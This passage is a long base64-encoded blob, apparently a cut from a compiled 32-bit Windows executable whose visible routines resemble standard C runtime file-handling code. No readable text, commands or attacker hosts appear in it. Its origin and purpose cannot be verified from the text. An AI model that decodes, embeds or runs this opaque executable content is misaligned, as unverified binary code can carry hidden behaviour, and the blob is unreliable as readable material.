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g8QQ/3UI6PMhAABZhcAPhJ0CAACLBvZEBwSAD4SQAgAA6E0cAACLQGwzyTlIFI2FHOX//w+UwVCLBv80B4mNIOX///8VeOBAAIXAD4RgAgAAM8k5jSDl//90CITbD4RQAgAA/xV04EAAi5005f//iYUc5f//M8CJhTzl//85RRAPhkIFAACJhUTl//+KhSfl//+EwA+FZwEAAIoLi7Uo5f//M8CA+QoPlMCJhSDl//+LBgPHg3g4AHQVilA0iFX0iE31g2A4AGoCjUX0UOtLD77BUOguMAAAWYXAdDqLjTTl//8rywNNEDPAQDvID4alAQAAagKNhUDl//9TUOiyLwAAg8QMg/j/D4SxBAAAQ/+FROX//+sbagFTjYVA5f//UOiOLwAAg8QMg/j/D4SNBAAAM8BQUGoFjU30UWoBjY1A5f//UVD/tRzl//9D/4VE5f///xVw4EAAi/CF9g+EXAQAAGoAjYU85f//UFaNRfRQi4Uo5f//iwD/NAf/FWzgQACFwA+EKQQAAIuFROX//4uNMOX//wPBObU85f//iYU45f//D4wVBAAAg70g5f//AA+EzQAAAGoAjYU85f//UGoBjUX0UIuFKOX//4sAxkX0Df80B/8VbOBAAIXAD4TQAwAAg7085f//AQ+MzwMAAP+FMOX///+FOOX//+mDAAAAPAF0BDwCdSEPtzMzyWaD/goPlMFDQ4OFROX//wKJtUDl//+JjSDl//88AXQEPAJ1Uv+1QOX//+gRUwAAWWY7hUDl//8PhWgDAACDhTjl//8Cg70g5f//AHQpag1YUImFQOX//+jkUgAAWWY7hUDl//8PhTsDAAD/hTjl////hTDl//+LRRA5hUTl//8Pgvn9///pJwMAAIsOihP/hTjl//+IVA80iw6JRA846Q4DAAAzyYsGA8f2QASAD4S/AgAAi4U05f//iY1A5f//hNsPhcoAAACJhTzl//85TRAPhiADAADrBou1KOX//4uNPOX//4OlROX//wArjTTl//+NhUjl//87TRBzOYuVPOX///+FPOX//4oSQYD6CnUQ/4Uw5f//xgANQP+FROX//4gQQP+FROX//4G9ROX///8TAABywovYjYVI5f//K9hqAI2FLOX//1BTjYVI5f//UIsG/zQH/xVs4EAAhcAPhEICAACLhSzl//8BhTjl//87ww+MOgIAAIuFPOX//yuFNOX//ztFEA+CTP///+kgAgAAiYVE5f//gPsCD4XRAAAAOU0QD4ZNAgAA6waLtSjl//+LjUTl//+DpTzl//8AK4005f//jYVI5f//O00Qc0aLlUTl//+DhUTl//8CD7cSQUFmg/oKdRaDhTDl//8Cag1bZokYQECDhTzl//8Cg4U85f//AmaJEEBAgb085f///hMAAHK1i9iNhUjl//8r2GoAjYUs5f//UFONhUjl//9Qiwb/NAf/FWzgQACFwA+EYgEAAIuFLOX//wGFOOX//zvDD4xaAQAAi4VE5f//K4U05f//O0UQD4I/////6UABAAA5TRAPhnwBAACLjUTl//+DpTzl//8AK4005f//agKNhUj5//9eO00QczyLlUTl//8PtxIBtUTl//8DzmaD+gp1DmoNW2aJGAPGAbU85f//AbU85f//ZokQA8aBvTzl//+oBgAAcr8z9lZWaFUNAACNjfDr//9RjY1I+f//K8GZK8LR+FCLwVBWaOn9AAD/FXDgQACL2DveD4SXAAAAagCNhSzl//9Qi8MrxlCNhDXw6///UIuFKOX//4sA/zQH/xVs4EAAhcB0DAO1LOX//zvef8vrDP8VGOBAAImFQOX//zvef1yLhUTl//8rhTTl//+JhTjl//87RRAPggr////rP2oAjY0s5f//Uf91EP+1NOX///8w/xVs4EAAhcB0FYuFLOX//4OlQOX//wCJhTjl///rDP8VGOBAAImFQOX//4O9OOX//wB1bIO9QOX//wB0LWoFXjm1QOX//3UU6D7c///HAAkAAADoRtz//4kw6z//tUDl///oStz//1nrMYu1KOX//4sG9kQHBEB0D4uFNOX//4A4GnUEM8DrJOj+2///xwAcAAAA6Abc//+DIACDyP/rDIuFOOX//yuFMOX//19bi038M81e6BXN///Jw2oQaOD6QADo4+f//4tFCIP4/nUb6Mrb//+DIADor9v//8cACQAAAIPI/+mdAAAAM/87x3wIOwWIK0EAciHoodv//4k46Ifb///HAAkAAABXV1dXV+gP2///g8QU68mLyMH5BY0cjaArQQCL8IPmH8HmBosLD75MMQSD4QF0v1DolEkAAFmJffyLA/ZEMAQBdBb/dRD/dQz/dQjoLvj//4PEDIlF5OsW6CTb///HAAkAAADoLNv//4k4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